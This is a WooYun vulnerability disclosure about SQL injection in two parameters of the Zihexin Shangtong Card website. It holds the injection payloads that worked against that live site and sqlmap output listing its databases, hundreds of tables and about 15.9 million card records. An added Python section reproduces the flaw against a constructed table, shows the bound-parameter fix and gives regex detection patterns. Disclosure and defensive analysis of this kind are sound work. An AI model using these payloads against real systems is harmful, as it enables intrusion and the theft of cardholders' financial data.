
Defect ID: wooyun-2016-0190022

Vulnerability title: Financial security: the Zihexin (资和信) Shangtong Card official site, site-wide data compromised / multiple injections bundled / involves a large volume of card number data

Affected vendor: 北京资和信咨询中心 (Beijing Zihexin Consulting Center)

Vulnerability author: 路人甲

Submitted: 2016-03-28 15:59

Fix time: 2016-05-12 15:59

Disclosed: 2016-05-12 15:59

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Vendor could not be contacted, or vendor actively ignored it

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-12: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Financial security: the Zihexin (资和信) Shangtong Card official site, site-wide data compromised / multiple injections bundled / involves a large volume of card number data

Detailed description:

http://www.zihexin.net/brand/offersinfor.do?action=4&ID=540055
http://www.zihexin.net/client/unit.do?method=info&STORE_ID=4000105444100022" -D "ZHXDB_SETTLE

Proof of vulnerability:

---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=4&ID=540055' AND 1957=1957 AND 'AQSu'='AQSu
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: action=4&ID=540055' UNION ALL SELECT CHR(113)||CHR(103)||CHR(102)||CHR(115)||CHR(113)||CHR(78)||CHR(117)||CHR(70)||CHR(102)||CHR(110)||CHR(98)||CHR(105)||CHR(108)||CHR(100)||CHR(106)||CHR(113)||CHR(111)||CHR(122)||CHR(122)||CHR(113),NULL FROM DUAL--
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] BILL
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] IGNITE_M
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZHXBK
[*] ZHXBK1
[*] ZHXDB_SETTLE
[*] ZHXDB_SETTLE_BANK
---
Place: GET
Parameter: STORE_ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=info&STORE_ID=4000105444100022' AND 6214=6214 AND 'mamy'='mamy
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: method=info&STORE_ID=-9947' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(108)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(72)||CHR(111)||CHR(101)||CHR(82)||CHR(98)||CHR(71)||CHR(86)||CHR(77)||CHR(65)||CHR(113)||CHR(105)||CHR(97)||CHR(105)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: method=info&STORE_ID=4000105444100022' AND 2158=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'OrDw'='OrDw
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: ZHXDB_SETTLE
[278 tables]
+-------------------------------+
| ACC_CARDTYPE_MARKET_BAK |
| AQUA_EXPLAIN_110408 |
| AQUA_EXPLAIN_115312 |
| CREATE_MERCH_TEMP |
| ETL_TRANS_DEF |
| FENGHUANGHUI |
| MOBILE_SEARCH_CARD_LOG |
| MOBILE_VISIT_LOG |
| STARBUCKS |
| STARBUCKS_TMP |
| STA_VIP_ACCCARDTYPE |
| STA_VIP_ACCCARDTYPEMARKET |
| STA_VIP_ACCHANDPAYLOG |
| STA_VIP_ACCMARKETFILE |
| STA_VIP_ACCMARKETFILEHANDFEE |
| STA_VIP_ACCPOSFILE |
| STA_VIP_ACCSIGNCOMPANY |
| STA_VIP_ACCVALIDCARD |
| STA_VIP_ACCWASTEBOOK |
| STA_VIP_ACTICARD |
| STA_VIP_ACTIMERCHANT |
| STA_VIP_ACTIMERCHANTTERMINAL |
| STA_VIP_ACTIPLAN |
| STA_VIP_ACTIROLE |
| STA_VIP_ACTIROLEDETAIL |
| STA_VIP_ALLCANCELTABLE |
| STA_VIP_CARDTYPE |
| STA_VIP_CARDTYPEMARKET |
| STA_VIP_JIFENACCUMWASTEBOOK |
| STA_VIP_MARKETFILE |
| STA_VIP_POSFILE |
| STA_VIP_STRIKELOG |
| STA_VIP_VALIDCARD |
| STA_VIP_WASTEBOOK |
| STA_XSHQ_WASTEBOOK |
| STA_XSH_WASTEBOOK |
| STL_BATCHDETAIL |
| STL_BATCHDETAIL_CP |
| STL_BATCHDETAIL_SAMSUNG |
| STL_DEFFTHAN_CPL |
| STL_DEFFTHAN_VIP |
| STL_DEFFTHAN_VIP_HIS |
| STL_DETAIL_NO_SETTLE_MERCH |
| STL_SYS_CARDTYPE |
| STL_SYS_CARDTYPE4MERCHANT |
| STL_SYS_SETTLECARDCATG |
| STL_SYS_SETTLECARDTYPE |
| STL_SYS_SETTLECARDTYPE_SPEC |
| STL_SYS_TRANS |
| STL_SYS_TRANSMESG |
| STL_VIP_REVERSAL |
| STL_VIP_TRANS |
| STL_VIP_TRANS_HIS |
| STL_VIP_TRANS_HIS_TEMP |
| STL_VIP_TRANS_TEMP |
| ST_ACCOUNT |
| ST_ACCOUNT_MERCH |
| ST_ACC_CARDTYPE_AREA |
| ST_AE_ETL_1824 |
| ST_AE_ETL_9824 |
| ST_AE_ETL_9825 |
| ST_AE_ETL_ACTPAYMENTINFO |
| ST_AE_ETL_ARBITRATION |
| ST_AE_ETL_BATCHDETAIL |
| ST_AE_ETL_CARDBAL |
| ST_AE_ETL_CHARGEBACK |
| ST_AE_ETL_CHARGEBACK_APP |
| ST_AE_ETL_CHARGE_DETAIL |
| ST_AE_ETL_CHARGE_THAWINFO |
| ST_AE_ETL_COLLECT |
| ST_AE_ETL_COLLECT_DETAIL |
| ST_AE_ETL_COLLECT_MAIN |
| ST_AE_ETL_COUNTRY |
| ST_AE_ETL_CURRENCY |
| ST_AE_ETL_CUST_CARD |
| ST_AE_ETL_DATAEXPR |
| ST_AE_ETL_EXCHANGE_RATE |
| ST_AE_ETL_FILERETURNS |
| ST_AE_ETL_MCC_RAL |
| ST_AE_ETL_PARAM |
| ST_AE_ETL_PPRDATA |
| ST_AE_ETL_PPRINFO |
| ST_AE_ETL_RETURNAMT |
| ST_AE_ETL_SETTLE_FEE |
| ST_AE_ETL_STATISTIC |
| ST_AE_ETL_SYSCB_CLEAR |
| ST_AE_ETL_SYSCHARGEBACK |
| ST_AE_ETL_THAWINFO |
| ST_AE_ETL_TRANS |
| ST_AE_ETL_TRANS_1110 |
| ST_AE_ETL_TRANS_1240 |
| ST_AE_ETL_TRANS_1644 |
| ST_AE_ETL_TRANS_CANCEL |
| ST_AE_ETL_TRANS_FEE |
| ST_AE_ETL_TRANS_MAIN |
| ST_AE_ETL_TRANS_TJ |
| ST_AE_ETL_UNFREEZE_LOG |
| ST_AGENTRECEIPT_MERCHINFO |
| ST_ANNOUNCE_INFO |
| ST_APPLICTION_USERS |
| ST_AREA |
| ST_AWARD |
| ST_AWARD_UPDATE |
| ST_BAM_ACCOUNTBALANCE |
| ST_BAM_BANK_ACCOUNT |
| ST_BAM_BANK_ACTUALDETAIL |
| ST_BAM_BANK_CUSTOMERMANAGER |
| ST_BAM_BANK_INFO |
| ST_BAM_BANK_PARAM |
| ST_BATCH_LOG |
| ST_BILL |
| ST_BILL_PRINT |
| ST_BRANCH |
| ST_BRANCH_INFO |
| ST_CANCEL_CONSTRACT |
| ST_CARD_TYPE |
| ST_CHANNEL |
| ST_CHINA_BANK |
| ST_CLOSE_STORE |
| ST_COLLECT |
| ST_COMPANY |
| ST_CONSUMER |
| ST_CREATE_MERCH_INFO |
| ST_CREDIT_PRINT |
| ST_EXAMINE |
| ST_EXAMINE_CHANGE |
| ST_EXAMINE_CHANGE_BAK |
| ST_EXAMINE_INFO |
| ST_EXAMINE_TERM |
| ST_FIX_ACCOUNT |
| ST_HEADOFFICE_INFO |
| ST_HEADOFFICE_MERCH |
| ST_INVOICE |
| ST_INVOICE_COLLECT |
| ST_INVOICE_INFO |
| ST_INVOICE_MANAGE |
| ST_INVOICE_MANAGE2 |
| ST_JKLINFO |
| ST_JKL_TRANS |
| ST_KAMEN_CARD_PRODUCT_RELA |
| ST_KAMEN_PRODUCT |
| ST_KAMEN_RATE_INFO |
| ST_KAMEN_SETTLE_INFO |
| ST_MANUAL_REFUND |
| ST_MCC_NEW |
| ST_MCC_NEW_RH_2016 |
| ST_MCC_NEW_RH_TMP |
| ST_MERCH_ACCOUNT |
| ST_MERCH_ACTIVATE |
| ST_MERCH_APP_ID |
| ST_MERCH_BASIC_INFO |
| ST_MERCH_CHANGE |
| ST_MERCH_LOCK |
| ST_MERCH_PAYMENT |
| ST_MERCH_PAYMENT_HIS |
| ST_MERCH_PAYMENT_LOG |
| ST_MERCH_PICTURE |
| ST_MERCH_PREPAYMENT |
| ST_MERCH_PREPAYMENT_STATISTIC |
| ST_MERCH_PRINT |
| ST_MERCH_TERM_REQ |
| ST_MOBILE_FEE |
| ST_NETWORKPAY |
| ST_NT_BANK_ACTUALDETAIL |
| ST_NT_BANK_FEE |
| ST_NT_BANK_INFO |
| ST_NT_BANK_RECEIVECOLLECT |
| ST_NT_BANK_RECEIVE_STATISTIC |
| ST_NT_ETL_BATCHDETAIL |
| ST_NT_ETL_BATCHDETAIL_ERROR |
| ST_NT_ETL_BATCHDETAIL_MAIN |
| ST_NT_ETL_BATCHDETAIL_NORATE |
| ST_NT_ETL_DZ_BCM_SOA |
| ST_NT_ETL_DZ_CMB_SOA |
| ST_NT_ETL_DZ_ICBC_HIST |
| ST_NT_ETL_DZ_ICBC_TDAY |
| ST_NT_ETL_DZ_SPDB_SOA |
| ST_NT_ETL_TRANS_BANK |
| ST_NT_ETL_TRANS_MAIN |
| ST_PAY |
| ST_PAYABLE_MESSAGE |
| ST_PAY_AUTOBAK |
| ST_PAY_AUTOBAK_BAK |
| ST_PAY_BAK |
| ST_PAY_CARDTYPE_41 |
| ST_PAY_DETAIL |
| ST_PAY_DETAIL08 |
| ST_PAY_DETAIL_TEST |
| ST_PAY_DETAIL_TMP |
| ST_PAY_TMP |
| ST_POWER |
| ST_PROC_LOG |
| ST_RATE |
| ST_RATE_AMT |
| ST_RATE_CHANGE |
| ST_ROLE |
| ST_ROLE_CONSUMER |
| ST_ROLE_POWER |
| ST_ROLE_SETTLE |
| ST_RUN_LOG |
| ST_SETTLE_LIST_BATCH |
| ST_SETTLE_LIST_DAY |
| ST_SETTLE_LIST_NORATE |
| ST_SETTLE_MESSAGE |
| ST_SETTLE_NEWLIST |
| ST_SETTLE_NEWLIST_TMP |
| ST_SETTLE_NEWLIST_TMP1 |
| ST_SETTLE_NEWLIST_TMP2 |
| ST_SETTLE_NEWLIST_TMP3 |
| ST_STORE_CLOSE |
| ST_SUM_CARDDAY |
| ST_SUM_CARDDAY_TMP |
| ST_SUM_CARDDAY_VIEW |
| ST_SUM_CARDDAY_VIEW_PAY |
| ST_SUM_CARDDAY_VIEW_TEMP1 |
| ST_SUNING_INFO |
| ST_TERM |
| ST_TERM_AUDITFLAG |
| ST_TERM_AUDITFLAG_HRS |
| ST_TERM_AUDITINFO |
| ST_TERM_CHANGE |
| ST_TERM_CLASS |
| ST_TERM_COMP |
| ST_TERM_MODIFY |
| ST_TERM_YUMINFO |
| ST_TERM_ZHONGBAI |
| ST_TON_HLP |
| ST_XBK_SETTLE_DATE |
| ST_YUM_ERROR_INFO |
| ST_YUM_SETTLE_INFO |
| T1 |
| TEST1 |
| TEST2 |
| TEST3 |
| TEST4 |
| TEST_GGS_FOR_DADING |
| TEST_MDPOS |
| TEST_ZH |
| TMP_RUN_LOG |
| WEB_ACTIVITY |
| WEB_ACTIVITY_STORE |
| WEB_ADVISE |
| WEB_AWARD |
| WEB_BANK |
| WEB_BANNER |
| WEB_CHANGE_USER |
| WEB_COMPANY_CITY |
| WEB_DISCOUNT |
| WEB_GROUP |
| WEB_ISSUE_ACTIVITY |
| WEB_ISSUE_AWARD |
| WEB_ISSUE_BANNER |
| WEB_ISSUE_DISCOUNT |
| WEB_ISSUE_LOGO |
| WEB_ISSUE_NOTICE |
| WEB_ISSUE_STORE |
| WEB_ISSUE_STORE_20140928 |
| WEB_LABEL |
| WEB_LABEL_MCC |
| WEB_LOGO |
| WEB_LOGO_STORE |
| WEB_MCC |
| WEB_MERCH |
| WEB_MERCH_SITE |
| WEB_NEWS |
| WEB_NOTICE |
| WEB_NOTICE_STORE |
| WEB_POSITION |
| WEB_SENSITIVE |
| WEB_SITE |
| WEB_SITE_BANK |
| WEB_STORE |
| WEB_STORE_20140928 |
| WEB_STORE_LABEL |
| WEB_WORD_LOG |
| WEM_TMP |
| WEM_TMP2 |
| YUM_20150506 |
+-------------------------------+
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: ZHXBK
+------------------+----------+
| Table            | Entries  |
+------------------+----------+
| ACC_CARD_BANK    | 15945274 |
| ACC_VALID_CARD   | 15945272 |
| ACC_CARD_SQL_LOG |     3880 |
| USER_TABEL       |        2 |
| ACC_CARD_TYPE    |        1 |
| EDITION_FILE     |        1 |
+------------------+----------+

Remediation:

Filter the parameters.
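Both findings above are the string-concatenation pattern: a request parameter (ID, STORE_ID) is spliced into the SQL text, so a quote in the value closes the literal and the remainder is parsed as SQL. The example below is added here and is not code from the report or from the vendor's site. It assumes SQLite as a stand-in for the Oracle back end (the report's boolean-based blind payload is DBMS-agnostic), and the offers table, its columns and the access-log lines are constructed. It shows the report's payload succeeding against a concatenated query and failing against a bound parameter, an allow-list check for the numeric IDs (the "parameter filtering" of the remediation), and a scan that flags the payload shapes from the report in Nginx-style access-log lines.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# --- 1. Why the report's boolean-based blind payload works --------------------
# Constructed stand-in for the offersinfor.do?ID=... lookup. The schema is an
# assumption; SQLite replaces the Oracle back end seen in the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE offers (id TEXT PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO offers VALUES (?, ?)",
                     [("540055", "offer A"), ("540056", "offer B")])
    return conn

def lookup_concat(conn, offer_id):
    """Vulnerable pattern: the request parameter is spliced into the SQL text."""
    sql = "SELECT title FROM offers WHERE id = '" + offer_id + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, offer_id):
    """Hardened pattern: bound parameter, so the value is never parsed as SQL."""
    return [row[0] for row in conn.execute(
        "SELECT title FROM offers WHERE id = ?", (offer_id,))]

def is_valid_id(value):
    """Allow-list check: both IDs in the report's URLs are plain digit strings."""
    return re.fullmatch(r"[0-9]{1,20}", value) is not None

TRUE_PAYLOAD = "540055' AND 1957=1957 AND 'AQSu'='AQSu"   # payload from the report
FALSE_PAYLOAD = "540055' AND 1957=1958 AND 'AQSu'='AQSu"  # constructed false branch

# --- 2. Spotting the same payload shapes in access logs ----------------------
# Each pattern corresponds to one injection technique listed in the sqlmap output.
INJECTION_SIGNS = {
    "boolean_blind": re.compile(r"'\s*AND\s+\d+=\d+\s+AND\s+'", re.I),
    "union_select": re.compile(r"UNION\s+ALL\s+SELECT", re.I),
    "oracle_chr": re.compile(r"CHR\(\d+\)\s*\|\|", re.I),
    "time_blind_heavy": re.compile(r"FROM\s+ALL_USERS\s+T1\s*,", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def flag_query_string(query_string):
    """Return the names of all patterns found in the URL-decoded query string."""
    decoded = unquote_plus(query_string)
    return [name for name, pat in INJECTION_SIGNS.items() if pat.search(decoded)]

def scan_log(lines):
    """Return (line_index, [pattern names]) for each request that matches."""
    hits = []
    for n, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        names = flag_query_string(query)
        if names:
            hits.append((n, names))
    return hits

# Constructed Nginx combined-format lines; the payloads mirror the report's.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Mar/2016:15:59:01 +0800] "GET /brand/offersinfor.do?action=4&ID=540055 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [28/Mar/2016:15:59:02 +0800] "GET /brand/offersinfor.do?action=4&ID=540055%27%20AND%201957%3D1957%20AND%20%27AQSu%27%3D%27AQSu HTTP/1.1" 200 5120',
    '10.0.0.5 - - [28/Mar/2016:15:59:03 +0800] "GET /client/unit.do?method=info&STORE_ID=-9947%27%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28108%29%2CNULL%20FROM%20DUAL-- HTTP/1.1" 200 3300',
    '10.0.0.5 - - [28/Mar/2016:15:59:04 +0800] "GET /client/unit.do?method=info&STORE_ID=4000105444100022%27%20AND%202158%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%29%20AND%20%27OrDw%27%3D%27OrDw HTTP/1.1" 200 3300',
]

if __name__ == "__main__":
    conn = make_db()
    print("concat, true branch :", lookup_concat(conn, TRUE_PAYLOAD))
    print("concat, false branch:", lookup_concat(conn, FALSE_PAYLOAD))
    print("param, true branch  :", lookup_param(conn, TRUE_PAYLOAD))
    print("valid id?", is_valid_id("4000105444100022"), is_valid_id(TRUE_PAYLOAD))
    for idx, names in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(names)}")
```

The concatenated lookup returns a row for the true branch and nothing for the false branch, which is exactly the oracle a boolean-based blind technique relies on; with a bound parameter both payloads are compared as a literal id and return nothing. The allow-list check belongs in front of the query as defence in depth, not as a replacement for binding: a numeric ID should never need to contain a quote. The log patterns are signatures of the specific techniques shown in the report and will not catch every variant, so treat a hit as a trigger for review rather than as a complete detector.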

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 15 (WooYun rating)